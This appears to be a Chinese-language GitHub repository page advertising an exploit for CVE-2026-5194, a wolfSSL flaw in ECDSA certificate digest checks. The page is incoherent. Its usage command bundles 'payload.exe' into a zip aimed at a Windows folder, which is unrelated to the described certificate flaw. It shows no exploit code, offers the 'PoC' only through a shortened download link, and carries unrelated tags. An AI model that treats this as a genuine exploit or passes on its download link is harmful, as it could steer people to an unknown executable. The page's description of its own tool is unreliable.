jenniferreire26/CVE-2026-5194
GitHub: jenniferreire26/CVE-2026-5194
针对 Wolfssl 旧版本的 ECDSA 证书哈希摘要验证绕过漏洞利用工具。
Stars: 0 | Forks: 0
# CVE-2026-5194 - 安全漏洞
## 快速使用
```
python3 exploit.py -t "C:\\Path\\To\\Target" -o demo.zip --data-file payload.exe
```
## 利用说明
- **严重程度:** 危急
- **CVSS:** 9.1
- **影响:** 机密性、完整性
- **发布日期:** 2026-04-09
## 技术摘要
缺少哈希/摘要大小和 OID 检查,导致在验证 ECDSA 证书时接受小于允许值的摘要,或小于与相关密钥类型相适应的摘要。这可能会在使用了 EdDSA 或 ML-DSA 的情况下,导致基于 ECDSA 证书的身份验证安全性降低。
## 受影响版本
**Wolfssl Wolfssl:**
- 5.9.1 之前的版本
## 参考链接
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-5194
## 利用
[下载 PoC](https://tinyurl.com/29slpe3f)
标签:C/C++, CRITICAL, CVE-2026-5194, CVSS 9.1, ECDSA, NVD, OID, PoC, Python, WolfSSL, 事务性I/O, 加密协议, 哈希校验, 威胁模拟, 安全漏洞, 完整性, 密钥类型, 无后门, 暴力破解, 机密性, 签名验证, 证书验证, 逆向工具